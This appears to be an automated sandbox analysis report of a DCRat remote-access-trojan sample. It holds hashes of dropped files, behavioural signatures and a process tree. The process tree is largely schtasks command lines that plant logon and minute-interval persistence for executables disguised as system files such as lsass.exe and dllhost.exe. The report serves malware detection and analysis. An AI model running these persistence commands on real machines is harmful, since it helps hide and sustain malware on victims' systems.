| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Temp\BDITavvsiM.bat
| MD5 | c247b8c00be249ce109f07c51f21ffb8 |
| SHA1 | b6552642682fedf90a749268db210d6858d80c63 |
| SHA256 | 36412620b9c8c820fac478537b1f99de628054c01d0b2762acd19a117965fdc5 |
| SHA512 | 562fdd13fea07fa732bf75e78c3eb34d023e51963344f4b47d057794886a74d1af8b5c4e7984e0abbb37193b31cf700f967e8bbbf8fa33f9f48454268aeea97b |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OfficeClickToRun.exe.log
| MD5 | baf55b95da4a601229647f25dad12878 |
| SHA1 | abc16954ebfd213733c4493fc1910164d825cac8 |
| SHA256 | ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924 |
| SHA512 | 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545 |
memory/1696-128-0x0000000001280000-0x0000000001292000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\uOEGMIRuqZ.bat
| MD5 | 0a9c8fe9bc7b45ef13b66fe764729879 |
| SHA1 | 654fa018d8e5bec5e39b306a966b59898d667a2c |
| SHA256 | 732d070ff90e74fb0f7a7cee9b3e14621aa93a8a1ff01c3b0630c9c2692c93e7 |
| SHA512 | 1613acd9f3926a5c94bcf142434bcdea46217f84c4c50c960cabbe8bf7e711a989cc8c88a1b164c4300dfb24097d787bedcd216295df7287844600e7455dc92e |
C:\Users\Admin\AppData\Local\Temp\fcYyv3mAUp.bat
| MD5 | fd873be2fad17f615376e321579f388f |
| SHA1 | 2e9872aa1ab7d6d4176306f81050e21a9b6c6302 |
| SHA256 | fd061d5d3cbc54634862e98b9a74082ee0fd69de03b43bc31e055c2fd676ac00 |
| SHA512 | 95a47dd8c348e34eff6e028c135f7c8a35085d21359a03a38d1e1f916efa8aad66093bc4ae5a409822783063d631b4ff9e1438971ecbbb5aa428b7d75c039380 |
C:\Users\Admin\AppData\Local\Temp\WtQmBjXbDh.bat
| MD5 | cfe8dc7f5120ff12d136d64f6e7bdf95 |
| SHA1 | 5a0da512473308458bf7b6a55394d56f5856434e |
| SHA256 | 43c91f6d384012d00063cf80875c67b2b69c87c4b994047f6a8c422335d6f247 |
| SHA512 | 1c6a56ada13c37bcbb5573307e5745ef1a173ad8cef3d31db50a1eed66b4f366af980486ecf855667df98efff3f848b6251110b23848fcd2c494d197fd735483 |
C:\Users\Admin\AppData\Local\Temp\cV1vwDPsky.bat
| MD5 | 0971254c1135f72b231de989b84386d6 |
| SHA1 | 6ddd486881c6433b6162c4948ac605be9a791add |
| SHA256 | 2f34a30f083c491a95f7c79ed6f08d3f0a6c191fcce8536d0a61e8d38cc32037 |
| SHA512 | 0b76f6b25ef404c300d4ab4f2d4e63ce4a8ac70916186115454d0e0e4ad6739ccc96d007871d95c54ab20c56566310900a141532f57331ec6baee939b6db3944 |
C:\Users\Admin\AppData\Local\Temp\B4BP5ZSgoJ.bat
| MD5 | 114dbde5bfbdc826884e270f50925ec1 |
| SHA1 | 2fa496b35053d7e159e908141c4a29bac1320cb3 |
| SHA256 | 67d09b8806beda6bd983e25ca1d509ae560860c6dbe46b9b088d24ab222933c3 |
| SHA512 | aa09a7ea20d15f0a20927956f520444de192629b409ae187cb21366e365a3bbccc46bbcc47f5bdbfe588d2bdbbcd47b03346908c657c5a55563d9ce89cf18a12 |
memory/4328-159-0x000000001B370000-0x000000001B382000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pCY6B1XXru.bat
| MD5 | 9b571706378f3a57e135b060639dfc5e |
| SHA1 | 7cb56b54a4db57a50082966006c39e2191b53c96 |
| SHA256 | 38cc02969121ac5b50e461b7c4de7bf54e2867d58a5b3e6638aadc4c87c1345e |
| SHA512 | 7665d31dc3dae0009542db44218eb5477cceb1eb64188cd8abe1a14325c1725096c1621509576d8d1a12889567500b4d3d2198de71b48e7e7779170bf5b6977d |
C:\Users\Admin\AppData\Local\Temp\LnIbptgF5R.bat
| MD5 | 85b58ce8d23e207d4a37766a3d8eb760 |
| SHA1 | b4901f453b2f5c3d2e3199275c9913bc5da531b1 |
| SHA256 | 487b967865ecb1ef51adc864605f5ce95693decbf42a59036b162a66849c9865 |
| SHA512 | a4a1b08370d2a4eea65579fef94dd87d16c671fe50eb0a1434c0c6edd8491c655fe94cf418475cb58cdac22674c3b38ead8d6e91f4c42dce211b655d61018f5e |
C:\Users\Admin\AppData\Local\Temp\61cJPf1Vjg.bat
| MD5 | 31ed59759e769e6bdbe1b00fed9b43c9 |
| SHA1 | a96a729ab8e51ee0de211bce4a63fdbc5ddbb829 |
| SHA256 | 0c8e948b85f69ea929372b42b901ab04a8ebbce7052b03bef911cdd156df89ed |
| SHA512 | 3f36f00a1481629106a4e5a22092ebbc24741de2923873158f63c4d4411e96a900ecb58484ffe0d04c6c0d923e6a0fd94a73c23818e56f9310c3704c5bae7294 |
memory/3688-178-0x0000000002EF0000-0x0000000002F02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nGW3UwTeX7.bat
| MD5 | e76b251f9f682bcf332977f2d8eb4656 |
| SHA1 | 7dceb704903ae48e1d494cee59c73a90120f8cf7 |
| SHA256 | fab9a319f30fc9705f7f18d6f0220f73f417cc8206c7b34022bf94cdf588befd |
| SHA512 | fadeaa056f9a9aa1477c3c458c5af3b9e34825d24c441537c4e19331adde88dd8f7e0780ea35e783664217fa19886223203b600c827faf538bb4a2abb299335c |
C:\Users\Admin\AppData\Local\Temp\gTQuRhIyam.bat
| MD5 | 3be326aa543e8003199e4f0555033fe0 |
| SHA1 | 31b1208e711e85e1e6f24cbf2a0221396303ac7e |
| SHA256 | 84731cb8314b2d2f0b6fd0fbe251b4b26e9558b77d76120d387bf2cb3120e96e |
| SHA512 | dd835d42633f27d63c3889a42c5128899adbad089f2b6ce58947a494decf94f681c560bafa62ecb785489e275f7ec2d66c63ca950b17920596d832b1e22a59d2 |
memory/2108-191-0x00000000029B0000-0x00000000029C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\19YD2Vui68.bat
| MD5 | bb8e9f79d23c690fbd9303b2a71985db |
| SHA1 | 4daa8453ac70ffac864bb4d31a298a4515042a77 |
| SHA256 | 1440cd25db1378efebc2942f69ca5d33778d42784e984dbfac5603abc7af9de3 |
| SHA512 | b7e039c975d9bb069355555ee756b83ffb25d20376b6fbf7bb8cebc9cd141a49db860d899cfd2e68c566c26b68faa2c1d0f43bd43ed45229b29f4cafffea6029 |
memory/3316-198-0x0000000001810000-0x0000000001822000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\TdlfhXh7Yo.bat
| MD5 | d28b02cefce5aac26469d7077404cfab |
| SHA1 | caf6d4c6dfde92f556668e000173f34ea3d50e2f |
| SHA256 | fb194e0045611a2d8df76952fa6510a5b9edf291ae5e8b449752d0d9f8d43b34 |
| SHA512 | cfbd678a618816a9d28abe1f4d5715fa4e1a9ce6c25590eca64685f54c8fc1446e5723c1cb078e61303bf7a5f19fa2c23f15c82bd584d2dab7eb5826dbb8422b |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-30 02:47
Reported
2024-12-30 02:50
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
DcRat
Dcrat family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\providercommon\DllCommonsvc.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Windows Mail\en-US\cmd.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\5940a34987c991 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows NT\Accessories\OSPPSVC.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\wininit.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Mail\en-US\cmd.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Windows Mail\en-US\ebf1f9fa8afd6d | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\dllhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\MSBuild\services.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\MSBuild\c5b4cb5e9653cc | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\it-IT\dllhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Internet Explorer\it-IT\5940a34987c991 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Windows NT\Accessories\1610b97d3ab4a7 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\c5b4cb5e9653cc | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\dllhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\services.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\56085415360792 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\5940a34987c991 | C:\providercommon\DllCommonsvc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\RemotePackages\RemoteDesktops\conhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\security\audit\56085415360792 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\assembly\taskhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\RemotePackages\RemoteDesktops\conhost.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\RemotePackages\RemoteDesktops\088424020bedd6 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\security\audit\wininit.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\assembly\b75386f1303e64 | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\DigitalLocker\es-ES\dwm.exe | C:\providercommon\DllCommonsvc.exe | N/A |
| File created | C:\Windows\DigitalLocker\es-ES\6cb0b6c459d5d3 | C:\providercommon\DllCommonsvc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_fd08c5fd4d26d8e2fd0415fc25e954346e6b50b1eb20886d7c1943b06e2df29b.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\providercommon\1zu9dW.bat" "
C:\providercommon\DllCommonsvc.exe
"C:\providercommon\DllCommonsvc.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Windows\RemotePackages\RemoteDesktops\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Windows\RemotePackages\RemoteDesktops\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Internet Explorer\it-IT\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows NT\Accessories\OSPPSVC.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\OSPPSVC.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows NT\Accessories\OSPPSVC.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Temp\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Temp\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Temp\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Windows\security\audit\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\security\audit\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Windows\security\audit\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\en-US\cmd.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\en-US\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\en-US\cmd.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\18fc4542-69f6-11ef-a46c-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Office\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\taskhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 5 /tr "'C:\Windows\assembly\taskhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Windows\assembly\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\providercommon\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\providercommon\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
